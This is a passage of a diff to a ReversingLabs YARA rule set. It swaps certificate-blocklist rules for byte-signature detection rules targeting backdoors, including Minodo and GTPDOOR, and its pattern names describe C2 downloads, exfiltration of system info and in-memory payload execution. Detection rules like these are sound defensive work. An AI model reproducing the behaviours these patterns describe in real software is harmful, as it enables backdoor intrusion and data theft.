+            ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? 48 89 6C 24 ?? E8 ??
+            ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 33 DB 48 85 C0 0F 84 ?? ?? ?? ?? 45 33
+            C9 89 5C 24 ?? 45 33 C0 48 8D 0D ?? ?? ?? ?? 8B D6 FF D0 48 89 07 48 8B E8 48 85 C0
+            0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
+            F0 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
+            F0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CE FF 15 ?? ?? ?? ?? 48 85 C0
+            0F 84 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 45 33 C9 49 8B D6 48 8B CD FF D0 48 89 47 ?? 48
+        }
+		$network_communication_p2 = {
+            8B E8 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ??
+            ?? ?? ?? 48 8B F0 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ??
+            ?? ?? ?? 48 8B F0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CE FF 15 ?? ??
+            ?? ?? 48 85 C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 48 89 5C 24 ?? 4D 8B C7 49 8B
+            D4 48 89 5C 24 ?? 48 8B CD FF D0 48 8B D8 48 8D 0D ?? ?? ?? ?? 48 89 5F ?? C7 44 24
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 48 8D
+            0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B F8 48 8D 0D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8B D0 48 8B CF FF 15 ?? ?? ?? ?? 48 85 C0 74 ?? 41 B9 ?? ?? ?? ??
+            4C 8D 44 24 ?? 48 8B CB 41 8D 51 ?? FF D0 B8 ?? ?? ?? ?? EB ?? 48 89 5F ?? EB ?? 48
+            89 1F 33 C0 48 8B 6C 24 ?? 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ?? ?? 48 83 C4 ?? 41 5F
+            41 5E 41 5C 5F 5E 5B C3
+        }
+		$download_data_from_c2_p1 = {
+            4C 8B DC 55 56 57 49 8D AB ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48
+            33 C4 48 89 85 ?? ?? ?? ?? 49 89 5B ?? 33 FF 4D 89 63 ?? 48 8B D9 4D 89 6B ?? 48 8D
+            0D ?? ?? ?? ?? 4D 8B E8 4D 89 73 ?? 0F 57 C0 4D 89 7B ?? 33 C0 4C 8D 67 ?? 4D 8B C1
+            48 89 44 24 ?? 0F 11 44 24 ?? 8B F7 E8 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8B F8 48 85 C0
+            0F 84 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ??
+            E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D ?? 41 B8 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 4C 8B CB 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8D
+            45 ?? 49 8B DC 0F 1F 80 ?? ?? ?? ?? 48 FF C3 66 39 34 58 75 ?? 48 8D 0D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 4C 8B F0 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 4C 8B F0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8B D0 49 8B CE FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 4C 8B 7C 24 ?? 48 8D
+            55 ?? 49 8B CF 41 B9 ?? ?? ?? ?? 44 8B C3 FF D0 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 7C 24 ??
+            45 33 C9 C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 BA ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 49
+            8B CD FF D0 4C 8B E0 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48
+        }
+		$download_data_from_c2_p2 = {
+            8B CB FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 7C 24 ?? 45 33 C9 89 7C 24
+            ?? 45 33 C0 33 D2 89 7C 24 ?? 49 8B CF FF D0 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ??
+            ?? ?? 89 7C 24 ?? 89 7C 24 ?? 89 7C 24 ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C
+            24 ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 49 8B CF
+            FF D0 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ??
+            ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ??
+            ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ??
+            ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? 45 33 C0 48 89 4C 24 ?? 4C 8D 4C 24 ??
+            48 8D 4C 24 ?? BA ?? ?? ?? ?? 48 89 4C 24 ?? 49 8B CF FF D0 85 C0 0F 84 ?? ?? ?? ??
+            8B 5C 24 ?? FF 15 ?? ?? ?? ?? 44 8B C3 BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48
+            8B F0 48 85 C0 0F 84 ?? ?? ?? ?? 90 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8
+            ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8
+            ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ??
+            ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 54 24 ?? 49 8B CF FF D0 85 C0 0F 84 ?? ??
+            ?? ?? 44 8B 74 24 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48
+        }
+		$download_data_from_c2_p3 = {
+            8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48
+            8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85
+            C0 0F 84 ?? ?? ?? ?? 4C 8D 4C 24 ?? 45 8B C6 48 8B D6 49 8B CF FF D0 85 C0 74 ?? 44
+            8B 74 24 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48
+            85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48
+            8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85 C0 74 ??
+            4C 8D 4C 24 ?? 48 89 7C 24 ?? 45 8B C6 48 8B D6 49 8B CC FF D0 85 C0 74 ?? 39 7C 24
+            ?? 0F 87 ?? ?? ?? ?? BF ?? ?? ?? ?? 4C 8B 7C 24 ?? 48 8D 4C 24 ?? 44 8B F7 E8 ?? ??
+            ?? ?? 4D 85 E4 74 ?? 49 83 FC ?? 74 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8
+            E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8
+            E8 ?? ?? ?? ?? 48 8B F8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CF E8 ??
+            ?? ?? ?? 41 8B FE 48 85 C0 74 ?? 49 8B CC FF D0 4D 85 FF 74 ?? FF 15 ?? ?? ?? ?? 4D
+            8B C7 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ??
+            ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B A4 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 85 F6
+            74 ?? FF 15 ?? ?? ?? ?? 4C 8B C6 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 8B C7 48 8B 8D ??
+            ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5F 5E 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lets Start SP Z O O" and ( pe.signatures [ i ] . serial == "00:af:f7:62:e9:07:f0:64:4e:76:ed:8a:74:85:fb:12:a1" or pe.signatures [ i ] . serial == "af:f7:62:e9:07:f0:64:4e:76:ed:8a:74:85:fb:12:a1" ) and 1594882330 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $decrypt_configuration_p* ) ) and ( $decryption_algorithm ) and ( all of ( $request_access_token_p* ) ) and ( all of ( $network_communication_p* ) ) and ( all of ( $download_data_from_c2_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_D8530214Ca0F512946496B5164C61201 : INFO FILE
+rule REVERSINGLABS_Win32_Backdoor_Minodo : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Minodo backdoor."
 		author = "ReversingLabs"
-		id = "0125a67a-d5e7-5c93-a58c-cacb6d8fa60b"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "0eeff863-1a46-5b25-8780-5cd887e3b1e2"
+		date = "2023-06-07"
+		modified = "2023-06-07"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4910-L4928"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Win64.Backdoor.Minodo.yara#L1-L110"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "377962915586c9f5a5737c24b698c96efc2e819e52ee16109c405f9af2d57e7f"
+		logic_hash = "807408699fe00c8d1170598050e533dd0d79bb170f2538b6b6227cda7410060b"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "Minodo"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$generate_system_id = {
+            40 55 53 56 57 41 56 48 8D 6C 24 ?? 48 81 EC ?? ?? ?? ?? 4C 8B F1 48 8D 55 ?? 48 8D
+            4D ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 DB 85 C0 75 ?? 66 C7 45 ?? ?? ?? 4C
+            8D 45 ?? 48 8D 55 ?? B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75
+            ?? 66 C7 45 ?? ?? ?? 48 83 4D ?? ?? 4C 8D 4D ?? 4C 8D 45 ?? 8B CB 48 8B D3 BE ?? ??
+            ?? ?? 48 85 D2 7E ?? 44 8A 54 15 ?? EB ?? 44 8A 95 ?? ?? ?? ?? 41 8A 01 49 FF C1 48
+            FF C2 32 44 15 ?? 41 32 C2 41 32 00 49 FF C0 88 44 15 ?? 41 38 19 75 ?? 83 C9 ?? 4C
+            8D 4D ?? 41 38 18 75 ?? 83 C9 ?? 4C 8D 45 ?? 48 3B D6 75 ?? 83 C9 ?? 48 8B D3 83 F9
+            ?? 75 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? FF 15 ?? ?? ?? ?? 48 8D 5D ?? 49 8B FE 44
+            0F B6 03 48 8D 55 ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 83 C7 ?? 48 FF C3 48 FF CE 75 ??
+            FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? 8B D8 FF 15 ?? ?? ?? ?? 48 8D 55
+            ?? 44 8B CB 4D 8B C6 49 8B CE FF 15 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5E 5F 5E 5B
+            5D C3
+        }
+		$generate_encrypt_and_send_key = {
+            48 8B C4 48 89 58 ?? 48 89 68 ?? 48 89 70 ?? 48 89 78 ?? 41 56 48 81 EC ?? ?? ?? ??
+            8B F2 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 40 ?? 48 8B 08 8B 09
+            E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 45 33 C0 45 8D 70 ?? 41 8D 50 ?? 41 8B CE E8
+            ?? ?? ?? ?? 48 8B D8 83 F8 ?? 74 ?? 41 8D 6E ?? 48 8D 44 24 ?? 8B CD C6 00 ?? 48 FF
+            C0 48 FF C9 75 ?? 0F B7 CE 66 44 89 74 24 ?? E8 ?? ?? ?? ?? 48 8B CF 66 89 44 24 ??
+            E8 ?? ?? ?? ?? 48 63 FB 48 8D 54 24 ?? 48 8B CF 44 8B C5 89 44 24 ?? E8 ?? ?? ?? ??
+            85 C0 74 ?? 48 8B CF E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 2D ?? ?? ?? ?? BE ?? ?? ??
+            ?? 48 8B CD 8B D6 E8 ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? 33 C9 8A 44 29 ?? 48 FF C9 88
+            44 0C ?? 48 FF CE 75 ?? 8D 56 ?? 44 8D 46 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B CF
+            8B F0 85 C0 74 ?? 48 8D 54 24 ?? 45 33 C9 44 8B C0 E8 ?? ?? ?? ?? 3B C6 74 ?? 48 8B
+            CF E8 ?? ?? ?? ?? 33 DB 8B C3 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 6B ?? 49 8B
+            73 ?? 49 8B 7B ?? 49 8B E3 41 5E C3
+        }
+		$get_encrypt_and_send_system_info = {
+            48 89 5C 24 ?? 48 89 74 24 ?? 48 89 7C 24 ?? 55 48 8D 6C 24 ?? 48 81 EC ?? ?? ?? ??
+            8B F1 48 8B CA 48 8B DA FF 15 ?? ?? ?? ?? C6 44 24 ?? ?? 48 63 F8 40 88 7C 24 ?? 4C
+            8B C7 85 C0 74 ?? 48 8D 44 24 ?? 48 2B D8 48 8D 4C 24 ?? 49 FF C8 4A 8D 0C 01 8A 04
+            0B 88 01 75 ?? 83 C7 ?? 48 63 DF E8 ?? ?? ?? ?? BA ?? ?? ?? ?? F6 D8 48 8D 45 ?? 1A
+            C9 80 E1 ?? 80 C9 ?? FF C7 88 4C 1C ?? 8B CA C6 00 ?? 48 FF C0 48 FF C9 75 ?? 48 8D
+            4D ?? 89 55 ?? FF 15 ?? ?? ?? ?? 8A 45 ?? 48 63 CF 88 44 0C ?? 8A 45 ?? FF C7 48 63
+            CF FF C7 BB ?? ?? ?? ?? 88 44 0C ?? 8A 45 ?? 48 63 CF 88 44 0C ?? 8A 45 ?? FF C7 48
+            63 CF FF C7 4C 8D 85 ?? ?? ?? ?? 88 44 0C ?? 8A 45 ?? 48 63 D7 88 44 14 ?? 8B 45 ??
+            FF C7 48 63 D7 8D 4B ?? C6 44 24 ?? ?? 89 44 14 ?? 48 8D 54 24 ?? 83 C7 ?? 89 9D ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 44 8B C0 8D 48 ?? 03 CF
+            48 63 D1 48 83 FA ?? 76 ?? 44 8D 43 ?? 44 2B C7 48 63 C7 FF C7 4C 8D 54 24 ?? 44 88
+            44 04 ?? 48 63 C7 49 63 D0 4C 03 D0 45 85 C0 74 ?? 4C 8D 4C 24 ?? 4A 8D 0C 12 4D 2B
+            CA 48 FF C9 41 8A 04 09 88 01 48 FF CA 75 ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? 41
+            03 F8 C6 44 24 ?? ?? 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ??
+            ?? ?? 44 8B C0 8D 48 ?? 03 CF 48 63 D1 48 83 FA ?? 76 ?? 41 B8 ?? ?? ?? ?? 44 2B C7
+            48 63 C7 FF C7 4C 8D 54 24 ?? 44 88 44 04 ?? 48 63 C7 49 63 D0 4C 03 D0 45 85 C0 74
+            ?? 4C 8D 4C 24 ?? 4A 8D 0C 12 4D 2B CA 48 FF C9 42 8A 04 09 88 01 48 FF CA 75 ?? 4C
+            8D 4C 24 ?? 48 8D 54 24 ?? 44 03 C7 8B CE E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49
+            8B 5B ?? 49 8B 73 ?? 49 8B 7B ?? 49 8B E3 5D C3
+        }
+		$copy_payload_into_allocated_memory = {
+            48 89 5C 24 ?? 48 89 6C 24 ?? 56 57 41 56 48 83 EC ?? 49 8B D8 48 63 F2 48 8B F9 41
+            C6 00 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 66 C7 03 ?? ?? B8 ?? ??
+            ?? ?? E9 ?? ?? ?? ?? 4C 8D 4C 24 ?? 4C 8D 44 24 ?? 48 8B D3 48 8B CF E8 ?? ?? ?? ??
+            8B E8 85 C0 74 ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D6 33 C9 4C 8B F6 FF 15
+            ?? ?? ?? ?? 48 8B F0 48 85 C0 75 ?? 66 C7 03 ?? ?? FF 15 ?? ?? ?? ?? 89 43 ?? 8D 46
+            ?? EB ?? 4D 8B C6 48 8B D7 48 8B C8 E8 ?? ?? ?? ?? 48 83 64 24 ?? ?? 83 64 24 ?? ??
+            4C 8D 04 2E 45 33 C9 33 D2 33 C9 FF 15 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 8B 44
+            24 ?? 48 8B 5C 24 ?? 48 8B 6C 24 ?? 48 83 C4 ?? 41 5E 5F 5E C3
+        }
+		$execute_payload_from_temp = {
+            40 53 48 81 EC ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 4C 8B D1 48 8D 44 24 ?? 41 8B D0 33 DB
+            88 18 48 FF C0 48 FF CA 75 ?? 48 8D 44 24 ?? 8D 4A ?? 88 18 48 FF C0 48 FF C9 75 ??
+            48 8D 44 24 ?? 44 89 44 24 ?? 45 33 C9 48 89 44 24 ?? 48 8D 44 24 ?? 45 33 C0 48 89
+            44 24 ?? 48 89 5C 24 ?? 48 89 5C 24 ?? 49 8B D2 89 5C 24 ?? C7 84 24 ?? ?? ?? ?? ??
+            ?? ?? ?? 89 5C 24 ?? 66 89 9C 24 ?? ?? 00 00 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C
+            24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? B0 ?? EB ?? 32 C0 48 81 C4
+            ?? ?? ?? ?? 5B C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DJ ONLINE MARKETING LIMITED" and ( pe.signatures [ i ] . serial == "00:d8:53:02:14:ca:0f:51:29:46:49:6b:51:64:c6:12:01" or pe.signatures [ i ] . serial == "d8:53:02:14:ca:0f:51:29:46:49:6b:51:64:c6:12:01" ) and 1595485920 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $generate_system_id ) and ( $generate_encrypt_and_send_key ) and ( $get_encrypt_and_send_system_info ) and ( $copy_payload_into_allocated_memory ) and ( $execute_payload_from_temp )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_661Ba8F3C9D1B348413484E9A49502F7 : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_GTPDOOR : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects GTPDOOR backdoor."
 		author = "ReversingLabs"
-		id = "a0c501c9-a856-55b6-b845-aeab4db5ab51"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "9e6df856-fe54-504c-8530-321adc91cd5a"
+		date = "2024-09-10"
+		modified = "2024-09-10"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4930-L4948"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.GTPDOOR.yara#L1-L264"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4840b311c1e2c0ae14bb2cf6fa8d96ab1a434ceac861db540697f3aed1a6833f"
+		logic_hash = "b7b4b33b7838142e34c6d02260b6585305c4730c90e12b1adc099f9aeecf071a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "GTPDOOR"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unique Digital Services Ltd." and ( pe.signatures [ i ] . serial == "00:66:1b:a8:f3:c9:d1:b3:48:41:34:84:e9:a4:95:02:f7" or pe.signatures [ i ] . serial == "66:1b:a8:f3:c9:d1:b3:48:41:34:84:e9:a4:95:02:f7" ) and 1594942800 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_51Aead5A9Ab2D841B449Fa82De3A8A00 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "c4909945-f2f1-53b2-b438-edf411fda7ed"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4950-L4966"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e53095aab9d6c2745125e8cd933334ebc2e51a9725714d31a46baa74b8e42ed9"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$send_result_to_peer_v1_p1 = {
+            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 66 89 85 ?? ?? ?? ?? 66 89 95
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89
+            14 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 81 BD ?? ?? ?? ?? ?? ?? 77 ?? 0F B7 8D
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 55 ?? 89 C7 89 D6 FC F3 A4 EB ?? 8D 85 ?? ?? ?? ??
+            8B 55 ?? 89 C1 B8 ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 89 0C 24 E8 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 89 50 ??
+            8B 55 ?? 8B 45 ?? 89 42 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 89 C2 8D 85 ?? ?? ??
+            ?? 01 D0 89 45 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 0F B7 40 ?? 66 89 45 ?? 8B 45
+            ?? 0F B7 10 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B7 45 ?? 66 89 02 8B 45 ?? 89 C2 8D 85
+            ?? ?? ?? ?? 01 D0 89 45 ?? 8B 45 ?? C6 40 ?? ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ??
+            89 C2 8D 85 ?? ?? ?? ?? 01 D0 89 45 ?? 8B 45 ?? 66 C7 40 ?? ?? ?? 66 81 BD ?? ?? ??
+            ?? ?? ?? 76 ?? 8B 45 ?? 83 C0 ?? BA ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ??
+            8B 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? C7 04 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 66 C7 40 ?? ?? ?? EB ?? 8B
+            45 ?? 83 C0 ?? 0F B7 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 8B 45 ??
+            89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 83
+        }
+		$send_result_to_peer_v1_p2 = {
+            C0 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B7 85
+            ?? ?? ?? ?? 66 89 42 ?? 8B 45 ?? 0F B7 40 ?? 83 C0 ?? 0F B7 C0 89 04 24 E8 ?? ?? ??
+            ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 0F B7 50 ?? 8B 45 ?? 0F B7 40 ?? 8D 04 02 8D
+            50 ?? 8B 45 ?? 66 89 50 ?? 8B 45 ?? 0F B7 40 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 89
+            C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 0F B7 40 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 66 89
+            45 ?? 8B 45 ?? 66 C7 40 ?? ?? ?? 0F B7 4D ?? 8B 5D ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 8B
+            40 ?? 89 4C 24 ?? 89 5C 24 ?? 89 54 24 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ??
